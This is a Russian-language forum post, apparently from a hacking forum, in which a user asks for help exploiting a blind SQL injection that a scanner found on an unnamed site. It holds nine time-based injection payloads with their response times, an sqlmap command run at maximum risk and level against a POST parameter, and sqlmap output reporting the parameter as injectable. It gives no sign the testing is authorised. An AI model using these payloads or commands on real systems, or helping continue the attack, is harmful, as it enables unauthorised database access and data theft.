
21.02.2020, 18:04
|
|
Новичок
Регистрация: 04.11.2018
Сообщений: 2
С нами:
3961046
Репутация:
0
|
|
Кто сможет помочь, Акунет нашел скулю слепую.
- 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
- 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
Начинаю крутить Sql map пишу следующее
тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5
Он мне пишет что параметр уязвим.
[16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable
it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
Но потом ничего не находит
каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\
Что можно попробовать подскажите пожалуйста.
|
|
|